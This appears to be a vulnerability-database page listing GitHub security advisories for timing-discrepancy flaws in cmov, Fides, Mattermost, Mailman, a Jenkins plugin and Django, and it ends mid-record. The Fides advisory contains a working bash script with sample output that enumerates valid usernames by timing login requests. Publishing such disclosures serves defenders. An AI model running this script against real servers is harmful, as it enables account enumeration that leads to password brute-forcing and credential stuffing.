CWE-208
AllowedObservable Timing Discrepancy
Abstraction: Base · Status: Incomplete
Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not.
306 vulnerabilities reference this CWE, most recent first.
GHSA-2GQC-6J2Q-83QP
Vulnerability from github – Published: 2026-01-15 18:17 – Updated: 2026-01-23 21:46Summary
thumbv6m-none-eabi (Cortex M0, M0+ and M1) compiler emits non-constant time assembly when using cmovnz (portable version). I did not found any other target with the same behaviour but I did not go through all targets supported by Rust.
Details
It seems that, during mask computation, an LLVM optimisation pass is detecting that bitnz is returning 0 or 1, that can be interpreted as a boolean. This intermediate value is not masked by a call to black_box and thus the subsequent .wrapping_sub(1) can be interpreted as a conditional bitwise conditional not.
PoC
This is an attempt at having a minimal faulty code. In a library crate with an up-to-date cmov as only dependency, the content of src/lib.rs is:
#![no_std]
use cmov::Cmov;
#[inline(never)]
pub fn test_ct_cmov(a: &mut u8, b: u8, c: u8) {
a.cmovnz(&b, c);
}
The resulting assembly emitted (shown using cargo asm --release --target thumbv6m-none-eabi that uses cargo-show-asm):
.section .text.not_ct::test_ct_cmov,"ax",%progbits
.globl not_ct::test_ct_cmov
.p2align 1
.type not_ct::test_ct_cmov,%function
.code 16
.thumb_func
not_ct::test_ct_cmov:
.fnstart
.cfi_sections .debug_frame
.cfi_startproc
.save {r7, lr}
push {r7, lr}
.cfi_def_cfa_offset 8
.cfi_offset lr, -4
.cfi_offset r7, -8
.setfp r7, sp
add r7, sp, #0
.cfi_def_cfa_register r7
.pad #8
sub sp, #8
movs r3, #0
lsls r2, r2, #24
bne .LBB0_2
mvns r3, r3
.LBB0_2:
ldrb r2, [r0]
str r3, [sp, #4]
str r3, [sp]
mov r3, sp
@APP
@NO_APP
ldr r3, [sp]
bics r1, r3
ands r2, r3
adds r1, r2, r1
strb r1, [r0]
add sp, #8
pop {r7, pc}
The non-constant time assembly is:
bne .LBB0_2
mvns r3, r3
.LBB0_2:
Impact
The exact impact is unclear, especially since cmov clearly warns users that the portable version is best-effort.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "cmov"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.4.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23519"
],
"database_specific": {
"cwe_ids": [
"CWE-203",
"CWE-208"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-15T18:17:15Z",
"nvd_published_at": "2026-01-15T20:16:05Z",
"severity": "HIGH"
},
"details": "### Summary\n\n`thumbv6m-none-eabi` (Cortex M0, M0+ and M1) compiler emits non-constant time assembly when using `cmovnz` (portable version). I did not found any other target with the same behaviour but I did not go through all targets supported by Rust. \n\n### Details\n\nIt seems that, [during `mask` computation](https://github.com/RustCrypto/utils/blob/9e555db060c80f4669d804f448a524a37d201b32/cmov/src/portable.rs#L78), an LLVM optimisation pass is detecting that [`bitnz`](https://github.com/RustCrypto/utils/blob/9e555db060c80f4669d804f448a524a37d201b32/cmov/src/portable.rs#L13) is returning 0 or 1, that can be interpreted as a boolean. This intermediate value is not masked by a call to `black_box` and thus the subsequent [`.wrapping_sub(1)`](https://github.com/RustCrypto/utils/blob/9e555db060c80f4669d804f448a524a37d201b32/cmov/src/portable.rs#L78C1-L78C84) can be interpreted as a conditional bitwise conditional not.\n\n### PoC\n\nThis is an attempt at having a minimal faulty code. In a library crate with an up-to-date `cmov` as only dependency, the content of `src/lib.rs` is:\n\n```rust\n#![no_std]\nuse cmov::Cmov;\n\n#[inline(never)]\npub fn test_ct_cmov(a: \u0026mut u8, b: u8, c: u8) {\n a.cmovnz(\u0026b, c);\n}\n```\n\n\nThe resulting assembly emitted (shown using `cargo asm --release --target thumbv6m-none-eabi` that uses [`cargo-show-asm`](https://crates.io/crates/cargo-show-asm)):\n\n\u003cdetails\u003e\n\u003csummary\u003eCollapsed assembly\u003c/summary\u003e\n\n```asm\n.section .text.not_ct::test_ct_cmov,\"ax\",%progbits\n\t.globl\tnot_ct::test_ct_cmov\n\t.p2align\t1\n\t.type\tnot_ct::test_ct_cmov,%function\n\t.code\t16\n\t.thumb_func\nnot_ct::test_ct_cmov:\n\t.fnstart\n\t.cfi_sections .debug_frame\n\t.cfi_startproc\n\t.save\t{r7, lr}\n\tpush {r7, lr}\n\t.cfi_def_cfa_offset 8\n\t.cfi_offset lr, -4\n\t.cfi_offset r7, -8\n\t.setfp\tr7, sp\n\tadd r7, sp, #0\n\t.cfi_def_cfa_register r7\n\t.pad\t#8\n\tsub sp, #8\n\tmovs r3, #0\n\tlsls r2, r2, #24\n\tbne .LBB0_2\n\tmvns r3, r3\n.LBB0_2:\n\tldrb r2, [r0]\n\tstr r3, [sp, #4]\n\tstr r3, [sp]\n\tmov r3, sp\n\t@APP\n\t@NO_APP\n\tldr r3, [sp]\n\tbics r1, r3\n\tands r2, r3\n\tadds r1, r2, r1\n\tstrb r1, [r0]\n\tadd sp, #8\n\tpop {r7, pc}\n```\n\n\u003c/details\u003e\n\nThe non-constant time assembly is:\n\n```asm\n bne .LBB0_2\n mvns r3, r3\n.LBB0_2:\n```\n\n### Impact\n\nThe exact impact is unclear, especially since `cmov` clearly warns users that the portable version is best-effort.",
"id": "GHSA-2gqc-6j2q-83qp",
"modified": "2026-01-23T21:46:10Z",
"published": "2026-01-15T18:17:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/RustCrypto/utils/security/advisories/GHSA-2gqc-6j2q-83qp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23519"
},
{
"type": "WEB",
"url": "https://github.com/RustCrypto/utils/commit/55977257e7c82a309d5e8abfdd380a774f0f9778"
},
{
"type": "PACKAGE",
"url": "https://github.com/RustCrypto/utils"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2026-0003.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "RustCrypto Utilities cmov: `thumbv6m-none-eabi` compiler emits non-constant time assembly when using `cmovnz`"
}
GHSA-2H46-8GF5-FMXV
Vulnerability from github – Published: 2024-09-04 18:03 – Updated: 2024-09-04 18:03A timing-based username enumeration vulnerability has been identified in Fides Webserver authentication. This vulnerability allows an unauthenticated attacker to determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. The discrepancy in response times between valid and invalid usernames can be leveraged to enumerate users on the system.
Impact
This vulnerability enables a timing-based username enumeration attack. An attacker can systematically guess and verify which usernames are valid by measuring the server's response time to authentication requests. This information can be used to conduct further attacks on authentication such as password brute-forcing and credential stuffing.
Patches
The vulnerability has been patched in Fides version 2.44.0. Users are advised to upgrade to this version or later to secure their systems against this threat.
Workarounds
There are no workarounds.
Proof of Concept
- Create a valid user called
valid_useron a remote Fides server. Ensure that there is no user on the server namedinvalid_user. Note that this vulnerability is not reproducible on a local deployment due to the extremely low latency of responses to login requests. - In a terminal run
export LOGIN_URL='https://example.com/api/v1/login', replacingexample.comwith your remote Fides server's domain or IP address. - In the same terminal run
exploit-poc.sh(detailed below). - It's possible to distinguish between valid and invalid users based on the low latency (time difference) for invalid users.
#!/bin/bash
# Function to test login and calculate average transfer times
test_login(){
echo -e "\nTesting login for user: $1\n"
total_diff=0
for (( i=1; i <= 20; ++i ))
do
echo -n "Attempt #$i: "
resp=$(curl -w @- "$LOGIN_URL" \
-H 'content-type: application/json' \
--data-raw '{"username":"'$1'","password":"d3JvbmdwYXNzd29yZA=="}' \
-o /dev/null -s <<'EOF'
{
"pretransfer": %{time_pretransfer},
"starttransfer": %{time_starttransfer}
}
EOF
)
pre=$(echo $resp | jq '.pretransfer')
start=$(echo $resp | jq '.starttransfer')
diff=$(echo "$start - $pre" | bc)
# Accumulate total diff
total_diff=$(echo "$total_diff + $diff" | bc)
# Print the result of this iteration
printf "Pretransfer: %.4f, Starttransfer: %.4f, Diff: %.4f\n" "$pre" "$start" "$diff"
done
# Calculate average diff
avg_diff=$(echo "scale=4; $total_diff / 20" | bc)
# Print average time
echo -e "\nAverage Time Difference for $1: $avg_diff seconds\n"
}
# Ensure that LOGIN_URL is set
if [ -z "$LOGIN_URL" ]; then
echo "Error: LOGIN_URL environment variable is not set."
exit 1
fi
# Test valid and invalid users
test_login valid_user
test_login invalid_user
Sample script run
~ ❯ ./exploit-poc.sh
Testing login for user: valid_user
Attempt #1: Pretransfer: 0.3006, Starttransfer: 0.7404, Diff: 0.4398
Attempt #2: Pretransfer: 0.2755, Starttransfer: 1.2506, Diff: 0.9751
Attempt #3: Pretransfer: 0.2595, Starttransfer: 0.7108, Diff: 0.4512
Attempt #4: Pretransfer: 0.2551, Starttransfer: 1.0483, Diff: 0.7932
Attempt #5: Pretransfer: 0.2553, Starttransfer: 0.6680, Diff: 0.4127
Attempt #6: Pretransfer: 0.2599, Starttransfer: 0.6712, Diff: 0.4113
Attempt #7: Pretransfer: 0.2518, Starttransfer: 0.6603, Diff: 0.4085
Attempt #8: Pretransfer: 0.2467, Starttransfer: 0.6812, Diff: 0.4344
Attempt #9: Pretransfer: 0.2502, Starttransfer: 0.8175, Diff: 0.5673
Attempt #10: Pretransfer: 0.2583, Starttransfer: 0.6904, Diff: 0.4321
Attempt #11: Pretransfer: 0.2573, Starttransfer: 0.6601, Diff: 0.4029
Attempt #12: Pretransfer: 0.2481, Starttransfer: 0.8495, Diff: 0.6014
Attempt #13: Pretransfer: 0.2487, Starttransfer: 0.6822, Diff: 0.4336
Attempt #14: Pretransfer: 0.2526, Starttransfer: 0.9728, Diff: 0.7201
Attempt #15: Pretransfer: 0.2573, Starttransfer: 0.9808, Diff: 0.7235
Attempt #16: Pretransfer: 0.2459, Starttransfer: 0.6536, Diff: 0.4078
Attempt #17: Pretransfer: 0.2508, Starttransfer: 0.9024, Diff: 0.6517
Attempt #18: Pretransfer: 0.2477, Starttransfer: 2.2049, Diff: 1.9572
Attempt #19: Pretransfer: 0.2523, Starttransfer: 2.1087, Diff: 1.8564
Attempt #20: Pretransfer: 0.2523, Starttransfer: 0.7308, Diff: 0.4785
Average Time Difference for valid_user: .6779 seconds
Testing login for user: invalid_user
Attempt #1: Pretransfer: 0.2496, Starttransfer: 0.4122, Diff: 0.1626
Attempt #2: Pretransfer: 0.2551, Starttransfer: 0.4049, Diff: 0.1498
Attempt #3: Pretransfer: 0.2480, Starttransfer: 0.6174, Diff: 0.3694
Attempt #4: Pretransfer: 0.2489, Starttransfer: 0.4611, Diff: 0.2122
Attempt #5: Pretransfer: 0.2513, Starttransfer: 0.4601, Diff: 0.2088
Attempt #6: Pretransfer: 0.2540, Starttransfer: 0.3946, Diff: 0.1406
Attempt #7: Pretransfer: 0.2504, Starttransfer: 0.9104, Diff: 0.6599
Attempt #8: Pretransfer: 0.2577, Starttransfer: 0.4095, Diff: 0.1518
Attempt #9: Pretransfer: 0.2497, Starttransfer: 0.3851, Diff: 0.1353
Attempt #10: Pretransfer: 0.2548, Starttransfer: 0.4024, Diff: 0.1476
Attempt #11: Pretransfer: 0.2559, Starttransfer: 0.4002, Diff: 0.1443
Attempt #12: Pretransfer: 0.2501, Starttransfer: 0.4075, Diff: 0.1573
Attempt #13: Pretransfer: 0.2560, Starttransfer: 0.3921, Diff: 0.1361
Attempt #14: Pretransfer: 0.2493, Starttransfer: 0.3933, Diff: 0.1440
Attempt #15: Pretransfer: 0.2493, Starttransfer: 0.3942, Diff: 0.1449
Attempt #16: Pretransfer: 0.2599, Starttransfer: 0.5111, Diff: 0.2512
Attempt #17: Pretransfer: 0.2455, Starttransfer: 0.4128, Diff: 0.1673
Attempt #18: Pretransfer: 0.2558, Starttransfer: 1.7535, Diff: 1.4977
Attempt #19: Pretransfer: 0.2515, Starttransfer: 1.4528, Diff: 1.2013
Attempt #20: Pretransfer: 0.2483, Starttransfer: 0.3893, Diff: 0.1410
Average Time Difference for invalid_user: .3161 seconds
~ ❯
Severity
This vulnerability has been assigned a severity of LOW.
Using CVSS v3.1 it could be scored asAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (5.3 Medium/Moderate) or AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N (0.0 None) depending on the Confidentiality impact metric used.
In Bugcrowd's vulnerability rating taxonomy it most likely be assigned a technical severity of P4 (Low) Broken Access Control (BAC) > Username/Email Enumeration > Non-Brute Force.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ethyca-fides"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.44.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-45052"
],
"database_specific": {
"cwe_ids": [
"CWE-208"
],
"github_reviewed": true,
"github_reviewed_at": "2024-09-04T18:03:26Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "A timing-based username enumeration vulnerability has been identified in Fides Webserver authentication. This vulnerability allows an unauthenticated attacker to determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. The discrepancy in response times between valid and invalid usernames can be leveraged to enumerate users on the system.\n\n### Impact\nThis vulnerability enables a timing-based username enumeration attack. An attacker can systematically guess and verify which usernames are valid by measuring the server\u0027s response time to authentication requests. This information can be used to conduct further attacks on authentication such as password brute-forcing and credential stuffing.\n\n### Patches\nThe vulnerability has been patched in Fides version `2.44.0`. Users are advised to upgrade to this version or later to secure their systems against this threat.\n\n### Workarounds\nThere are no workarounds.\n\n\n### Proof of Concept\n\n1. Create a valid user called `valid_user` on a remote Fides server. Ensure that there is no user on the server named `invalid_user`. Note that this vulnerability is not reproducible on a local deployment due to the extremely low latency of responses to login requests.\n2. In a terminal run `export LOGIN_URL=\u0027https://example.com/api/v1/login\u0027`, replacing `example.com` with your remote Fides server\u0027s domain or IP address.\n3. In the same terminal run `exploit-poc.sh` (detailed below).\n4. It\u0027s possible to distinguish between valid and invalid users based on the low latency (time difference) for invalid users. \n\n\n\u003cdetails\u003e\n\u003csummary\u003eExploit PoC script\u003c/summary\u003e\n\n```bash\n#!/bin/bash\n\n# Function to test login and calculate average transfer times\ntest_login(){\n echo -e \"\\nTesting login for user: $1\\n\"\n total_diff=0\n\n for (( i=1; i \u003c= 20; ++i ))\n do\n echo -n \"Attempt #$i: \"\n resp=$(curl -w @- \"$LOGIN_URL\" \\\n -H \u0027content-type: application/json\u0027 \\\n --data-raw \u0027{\"username\":\"\u0027$1\u0027\",\"password\":\"d3JvbmdwYXNzd29yZA==\"}\u0027 \\\n -o /dev/null -s \u003c\u003c\u0027EOF\u0027\n {\n \"pretransfer\": %{time_pretransfer},\n \"starttransfer\": %{time_starttransfer}\n }\nEOF\n )\n \n pre=$(echo $resp | jq \u0027.pretransfer\u0027)\n start=$(echo $resp | jq \u0027.starttransfer\u0027)\n diff=$(echo \"$start - $pre\" | bc)\n\n # Accumulate total diff\n total_diff=$(echo \"$total_diff + $diff\" | bc)\n \n # Print the result of this iteration\n printf \"Pretransfer: %.4f, Starttransfer: %.4f, Diff: %.4f\\n\" \"$pre\" \"$start\" \"$diff\"\n done\n \n # Calculate average diff\n avg_diff=$(echo \"scale=4; $total_diff / 20\" | bc)\n \n # Print average time\n echo -e \"\\nAverage Time Difference for $1: $avg_diff seconds\\n\"\n}\n\n# Ensure that LOGIN_URL is set\nif [ -z \"$LOGIN_URL\" ]; then\n echo \"Error: LOGIN_URL environment variable is not set.\"\n exit 1\nfi\n\n# Test valid and invalid users\ntest_login valid_user \ntest_login invalid_user\n```\n\n\u003c/details\u003e\n\n\n\u003cdetails\u003e\n\u003csummary\u003eSample script run\u003c/summary\u003e\n\n\n```\n~ \u276f ./exploit-poc.sh\n\nTesting login for user: valid_user\n\nAttempt #1: Pretransfer: 0.3006, Starttransfer: 0.7404, Diff: 0.4398\nAttempt #2: Pretransfer: 0.2755, Starttransfer: 1.2506, Diff: 0.9751\nAttempt #3: Pretransfer: 0.2595, Starttransfer: 0.7108, Diff: 0.4512\nAttempt #4: Pretransfer: 0.2551, Starttransfer: 1.0483, Diff: 0.7932\nAttempt #5: Pretransfer: 0.2553, Starttransfer: 0.6680, Diff: 0.4127\nAttempt #6: Pretransfer: 0.2599, Starttransfer: 0.6712, Diff: 0.4113\nAttempt #7: Pretransfer: 0.2518, Starttransfer: 0.6603, Diff: 0.4085\nAttempt #8: Pretransfer: 0.2467, Starttransfer: 0.6812, Diff: 0.4344\nAttempt #9: Pretransfer: 0.2502, Starttransfer: 0.8175, Diff: 0.5673\nAttempt #10: Pretransfer: 0.2583, Starttransfer: 0.6904, Diff: 0.4321\nAttempt #11: Pretransfer: 0.2573, Starttransfer: 0.6601, Diff: 0.4029\nAttempt #12: Pretransfer: 0.2481, Starttransfer: 0.8495, Diff: 0.6014\nAttempt #13: Pretransfer: 0.2487, Starttransfer: 0.6822, Diff: 0.4336\nAttempt #14: Pretransfer: 0.2526, Starttransfer: 0.9728, Diff: 0.7201\nAttempt #15: Pretransfer: 0.2573, Starttransfer: 0.9808, Diff: 0.7235\nAttempt #16: Pretransfer: 0.2459, Starttransfer: 0.6536, Diff: 0.4078\nAttempt #17: Pretransfer: 0.2508, Starttransfer: 0.9024, Diff: 0.6517\nAttempt #18: Pretransfer: 0.2477, Starttransfer: 2.2049, Diff: 1.9572\nAttempt #19: Pretransfer: 0.2523, Starttransfer: 2.1087, Diff: 1.8564\nAttempt #20: Pretransfer: 0.2523, Starttransfer: 0.7308, Diff: 0.4785\n\nAverage Time Difference for valid_user: .6779 seconds\n\n\nTesting login for user: invalid_user\n\nAttempt #1: Pretransfer: 0.2496, Starttransfer: 0.4122, Diff: 0.1626\nAttempt #2: Pretransfer: 0.2551, Starttransfer: 0.4049, Diff: 0.1498\nAttempt #3: Pretransfer: 0.2480, Starttransfer: 0.6174, Diff: 0.3694\nAttempt #4: Pretransfer: 0.2489, Starttransfer: 0.4611, Diff: 0.2122\nAttempt #5: Pretransfer: 0.2513, Starttransfer: 0.4601, Diff: 0.2088\nAttempt #6: Pretransfer: 0.2540, Starttransfer: 0.3946, Diff: 0.1406\nAttempt #7: Pretransfer: 0.2504, Starttransfer: 0.9104, Diff: 0.6599\nAttempt #8: Pretransfer: 0.2577, Starttransfer: 0.4095, Diff: 0.1518\nAttempt #9: Pretransfer: 0.2497, Starttransfer: 0.3851, Diff: 0.1353\nAttempt #10: Pretransfer: 0.2548, Starttransfer: 0.4024, Diff: 0.1476\nAttempt #11: Pretransfer: 0.2559, Starttransfer: 0.4002, Diff: 0.1443\nAttempt #12: Pretransfer: 0.2501, Starttransfer: 0.4075, Diff: 0.1573\nAttempt #13: Pretransfer: 0.2560, Starttransfer: 0.3921, Diff: 0.1361\nAttempt #14: Pretransfer: 0.2493, Starttransfer: 0.3933, Diff: 0.1440\nAttempt #15: Pretransfer: 0.2493, Starttransfer: 0.3942, Diff: 0.1449\nAttempt #16: Pretransfer: 0.2599, Starttransfer: 0.5111, Diff: 0.2512\nAttempt #17: Pretransfer: 0.2455, Starttransfer: 0.4128, Diff: 0.1673\nAttempt #18: Pretransfer: 0.2558, Starttransfer: 1.7535, Diff: 1.4977\nAttempt #19: Pretransfer: 0.2515, Starttransfer: 1.4528, Diff: 1.2013\nAttempt #20: Pretransfer: 0.2483, Starttransfer: 0.3893, Diff: 0.1410\n\nAverage Time Difference for invalid_user: .3161 seconds\n\n~ \u276f\n```\n\u003c/details\u003e\n\n### Severity\n\nThis vulnerability has been assigned a severity of LOW.\n\nUsing CVSS v3.1 it could be scored as`AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` (5.3 Medium/Moderate) or `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N` (0.0 None) depending on the Confidentiality impact metric used.\n\nIn [Bugcrowd\u0027s vulnerability rating taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy) it most likely be assigned a technical severity of P4 (Low) Broken Access Control (BAC) \u003e Username/Email Enumeration \u003e Non-Brute Force.",
"id": "GHSA-2h46-8gf5-fmxv",
"modified": "2024-09-04T18:03:26Z",
"published": "2024-09-04T18:03:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ethyca/fides/security/advisories/GHSA-2h46-8gf5-fmxv"
},
{
"type": "PACKAGE",
"url": "https://github.com/ethyca/fides"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Timing-Based Username Enumeration Vulnerability in Fides Webserver Authentication"
}
GHSA-2J87-P623-8CC2
Vulnerability from github – Published: 2025-04-16 12:31 – Updated: 2025-04-23 15:18Mattermost Plugin MSTeams versions <2.1.0 and Mattermost Server versions 10.5.x <=10.5.1 with the MS Teams plugin enabled fail to perform constant time comparison on a MSTeams plugin webhook secret which allows an attacker to retrieve the webhook secret of the MSTeams plugin via a timing attack during webhook secret comparison.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "10.5.0"
},
{
"fixed": "10.5.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost/server/v8"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.0.0-20250314142426-c049748b8863"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.15.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/mattermost/mattermost-plugin-msteams"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-27936"
],
"database_specific": {
"cwe_ids": [
"CWE-208"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-16T14:58:55Z",
"nvd_published_at": "2025-04-16T10:15:14Z",
"severity": "MODERATE"
},
"details": "Mattermost Plugin MSTeams versions \u003c2.1.0 and Mattermost Server\u00a0versions 10.5.x \u003c=10.5.1 with the MS Teams plugin enabled fail to perform constant time comparison on a MSTeams plugin webhook secret which allows\u00a0an attacker to retrieve the webhook secret of the MSTeams plugin via a timing attack during webhook secret comparison.",
"id": "GHSA-2j87-p623-8cc2",
"modified": "2025-04-23T15:18:35Z",
"published": "2025-04-16T12:31:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27936"
},
{
"type": "PACKAGE",
"url": "https://github.com/mattermost/mattermost"
},
{
"type": "WEB",
"url": "https://mattermost.com/security-updates"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-3618"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Mattermost vulnerable to Observable Timing Discrepancy"
}
GHSA-2JG5-XGVV-4WQ7
Vulnerability from github – Published: 2023-04-15 21:30 – Updated: 2024-09-30 16:52An issue was discovered in Mailman Core before 3.3.5. An attacker with access to the REST API could use timing attacks to determine the value of the configured REST API password and then make arbitrary REST API calls. The REST API is bound to localhost by default, limiting the ability for attackers to exploit this, but can optionally be made to listen on other interfaces.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "mailman"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.3.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-34337"
],
"database_specific": {
"cwe_ids": [
"CWE-208"
],
"github_reviewed": true,
"github_reviewed_at": "2023-04-18T13:05:08Z",
"nvd_published_at": "2023-04-15T20:16:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in Mailman Core before 3.3.5. An attacker with access to the REST API could use timing attacks to determine the value of the configured REST API password and then make arbitrary REST API calls. The REST API is bound to localhost by default, limiting the ability for attackers to exploit this, but can optionally be made to listen on other interfaces.",
"id": "GHSA-2jg5-xgvv-4wq7",
"modified": "2024-09-30T16:52:42Z",
"published": "2023-04-15T21:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34337"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/mailman/PYSEC-2023-22.yaml"
},
{
"type": "PACKAGE",
"url": "https://gitlab.com/mailman/mailman"
},
{
"type": "WEB",
"url": "https://gitlab.com/mailman/mailman/-/commit/e4a39488c4510fcad8851217f10e7337a196bb51"
},
{
"type": "WEB",
"url": "https://gitlab.com/mailman/mailman/-/issues/911"
},
{
"type": "WEB",
"url": "https://gitlab.com/mailman/mailman/-/tags"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Mailman Core vulnerable to timing attacks"
}
GHSA-2JXX-2X93-2Q2F
Vulnerability from github – Published: 2022-10-19 19:00 – Updated: 2022-12-16 17:24Generic Webhook Trigger Plugin 1.84.1 and earlier does not use a constant-time comparison when checking whether the provided and expected webhook token are equal.
This could potentially allow attackers to use statistical methods to obtain a valid webhook token.
Generic Webhook Trigger Plugin 1.84.2 uses a constant-time comparison when validating the webhook token.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins:generic-webhook-trigger"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.84.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-43412"
],
"database_specific": {
"cwe_ids": [
"CWE-203",
"CWE-208"
],
"github_reviewed": true,
"github_reviewed_at": "2022-10-19T22:23:54Z",
"nvd_published_at": "2022-10-19T16:15:00Z",
"severity": "LOW"
},
"details": "Generic Webhook Trigger Plugin 1.84.1 and earlier does not use a constant-time comparison when checking whether the provided and expected webhook token are equal.\n\nThis could potentially allow attackers to use statistical methods to obtain a valid webhook token.\n\nGeneric Webhook Trigger Plugin 1.84.2 uses a constant-time comparison when validating the webhook token.",
"id": "GHSA-2jxx-2x93-2q2f",
"modified": "2022-12-16T17:24:07Z",
"published": "2022-10-19T19:00:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43412"
},
{
"type": "PACKAGE",
"url": "https://github.com/jenkinsci/generic-webhook-trigger-plugin"
},
{
"type": "WEB",
"url": "https://www.jenkins.io/security/advisory/2022-10-19/#SECURITY-2874"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2022/10/19/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Non-constant time webhook token comparison in Jenkins Generic Webhook Trigger Plugin"
}
GHSA-2MCM-79HX-8FXW
Vulnerability from github – Published: 2026-02-03 15:30 – Updated: 2026-06-05 16:23An issue was discovered in 6.0 before 6.0.2, 5.2 before 5.2.11, and 4.2 before 4.2.28.
The django.contrib.auth.handlers.modwsgi.check_password() function for authentication via mod_wsgi allows remote attackers to enumerate users via a timing attack. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.
Django would like to thank Stackered for reporting this issue.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "Django"
},
"ranges": [
{
"events": [
{
"introduced": "6.0a1"
},
{
"fixed": "6.0.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "Django"
},
"ranges": [
{
"events": [
{
"introduced": "5.2a1"
},
{
"fixed": "5.2.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "Django"
},
"ranges": [
{
"events": [
{
"introduced": "4.2a1"
},
{
"fixed": "4.2.28"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-13473"
],
"database_specific": {
"cwe_ids": [
"CWE-208"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-03T19:22:54Z",
"nvd_published_at": "2026-02-03T15:16:11Z",
"severity": "LOW"
},
"details": "An issue was discovered in 6.0 before 6.0.2, 5.2 before 5.2.11, and 4.2 before 4.2.28.\n\nThe `django.contrib.auth.handlers.modwsgi.check_password()` function for authentication via `mod_wsgi` allows remote attackers to enumerate users via a timing attack. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\n\nDjango would like to thank Stackered for reporting this issue.",
"id": "GHSA-2mcm-79hx-8fxw",
"modified": "2026-06-05T16:23:51Z",
"published": "2026-02-03T15:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13473"
},
{
"type": "WEB",
"url": "https://docs.djangoproject.com/en/dev/releases/security"
},
{
"type": "PACKAGE",
"url": "https://github.com/django/django"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2026-42.yaml"
},
{
"type": "WEB",
"url": "https://groups.google.com/g/django-announce"
},
{
"type": "WEB",
"url": "https://www.djangoproject.com/weblog/2026/feb/03/security-releases"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
